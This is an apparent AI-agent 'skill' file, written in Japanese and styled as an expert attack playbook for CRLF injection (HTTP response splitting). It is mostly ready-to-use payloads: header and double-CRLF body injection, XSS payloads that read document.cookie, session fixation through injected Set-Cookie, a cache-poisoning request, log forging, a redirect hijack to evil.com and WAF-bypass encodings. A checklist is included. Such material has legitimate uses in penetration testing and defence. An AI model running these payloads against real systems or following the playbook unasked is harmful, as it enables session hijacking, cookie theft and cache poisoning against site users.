SKILL: CRLF インジェクション — エキスパート攻撃プレイブック

AI LOAD INSTRUCTION: CRLF インジェクション (HTTP レスポンス分割) 技術。ヘッダーインジェクション、ダブル CRLF 経由のレスポンスボディインジェクション、XSS エスカレーション、キャッシュポイズニング、およびエンコーディングバイパスをカバーします。スキャナーによって見落とされることが多いですが、XSS、セッション固定化、およびキャッシュ攻撃にチェーン可能です。

0. 関連ルーティング

• ghost-bits-cast-attack — ターゲットが Java サービス で %0D%0A / \r\n エンコーディングが WAF でブロックされている場合。瘍 (U+760D、下位バイト \r) と 瘊 (U+760A、下位バイト \n) を代わりに使用して、Angus Mail / Jakarta Mail SMTP、Apache HttpClient ヘッダー、JDK HttpServer レスポンス、ActiveJ HTTP を通じて実際の CRLF をインジェクトします (Jira CVE-2025-57733 および JDK CVE-2026-21933 クラスを再度有効化)

1. コアコンセプト

CRLF = \r\n (キャリッジリターン + ラインフィード、%0D%0A)。HTTP ヘッダーは CRLF で区切られます。ユーザー入力がサニタイズなしでレスポンスヘッダーに反映されている場合、CRLF 文字をインジェクトすると新しいヘッダーまたはレスポンスボディも作成できます。

通常: Location: /page?url=USER_INPUT
攻撃: Location: /page?url=%0D%0ASet-Cookie:admin=true
結果: 2つのヘッダー — Location + インジェクトされた Set-Cookie

---

2. 検出

基本プローブ

%0D%0ANew-Header:injected

# URL パラメータ内:
https://target.com/redirect?url=%0D%0AX-Injected:true

# レスポンスヘッダーで "X-Injected: true" を確認

ダブル CRLF — ボディインジェクション

2 つの連続した CRLF シーケンスはヘッダーを終了してボディを開始します:

%0D%0A%0D%0A<script>alert(1)</script>

# 結果:
HTTP/1.1 302 Found
Location: /page

<script>alert(1)</script>

---

3. 搾取シナリオ

Set-Cookie 経由のセッション固定化

%0D%0ASet-Cookie:PHPSESSID=attacker_controlled_session_id

レスポンスボディ経由の XSS

%0D%0A%0D%0A<html><script>alert(document.cookie)</script></html>

キャッシュポイズニング

CDN またはプロキシによってレスポンスがキャッシュされる場合、インジェクトされたヘッダー/ボディはすべてのユーザーに提供されます:

GET /page?q=%0D%0AContent-Length:0%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0AContent-Type:text/html%0D%0A%0D%0A<script>alert(1)</script>

ログインジェクション

ログ可視フィールド (User-Agent、Referer) の CRLF はログエントリを偽造できます:

User-Agent: normal%0D%0A127.0.0.1 - admin [date] "GET /admin" 200

---

4. フィルターバイパス

フィルター	バイパス
%0D%0A をブロック	%0D のみ、%0A のみ、または %E5%98%8A%E5%98%8D (Unicode) を試す
URL デコード 1 回	ダブルエンコード: %250D%250A
文字列 \r\n を削除	URL エンコード形式を使用
値のみでブロック	パラメータ名でインジェクト

# Unicode/UTF-8 バイパス:
%E5%98%8A%E5%98%8D  → 一部のパーサーで CRLF にデコード

# ダブル URL エンコード:
%250D%250A → サーバーが %0D%0A にデコード → CRLF として解釈

# 部分的なインジェクション (LF のみ):
%0A → 一部のサーバーは CR なしで LF を受け入れ

---

5. 実世界の搾取チェーン

CRLF + セッション固定化

# リダイレクトパラメータの CRLF 経由で Set-Cookie をインジェクト:
?url=%0D%0ASet-Cookie:PHPSESSID=attacker_controlled_session_id

# 結果:
HTTP/1.1 302 Found
Location: /page
Set-Cookie: PHPSESSID=attacker_controlled_session_id

# 被害者が攻撃者のセッションを使用 → ログイン後に攻撃者がハイジャック

CRLF → ダブル CRLF ボディインジェクション経由の XSS

# 2つの CRLF シーケンスがヘッダーを終了してレスポンスボディをインジェクト:
?url=%0D%0A%0D%0A<script>alert(document.cookie)</script>

# 結果:
HTTP/1.1 302 Found
Location: /page

<script>alert(document.cookie)</script>

302 Location の CRLF → リダイレクトハイジャック

# 元のヘッダーの前に新しい Location ヘッダーをインジェクト:
?url=%0D%0ALocation:http://evil.com%0D%0A%0D%0A

# 一部のサーバーは最後の Location ヘッダーを使用 → evil.com にリダイレクト

---

6. 一般的な脆弱なパターン

// PHP — ユーザー入力を使用した header() (PHP < 5.1.2 は脆弱):
header("Location: " . $_GET['url']);

// Python — サニタイズなしの入力を使用したリダイレクト:
return redirect(request.args.get('next'))

// Node.js — ユーザー入力を使用した setHeader:
res.setHeader('X-Custom', userInput);

// Java — ユーザー入力を使用した response.setHeader:
response.setHeader("Location", request.getParameter("url"));

---

7. テストチェックリスト

□ リダイレクト URL パラメータに %0D%0A をインジェクト
□ Set-Cookie 名/値パスに %0D%0A をインジェクト
□ ダブル CRLF でボディインジェクション → XSS を試す
□ エンコーディングバイパスをテスト: ダブルエンコード、Unicode (%E5%98%8D%E5%98%8A)、LF のみ (%0A)
□ レスポンスがキャッシュ可能かどうかを確認 → キャッシュポイズニング
□ User-Agent / Referer のログインジェクションをテスト
□ CRLF + Set-Cookie をセッション固定化でテスト
□ Location ヘッダーが 302 レスポンスでインジェクト可能かどうかを確認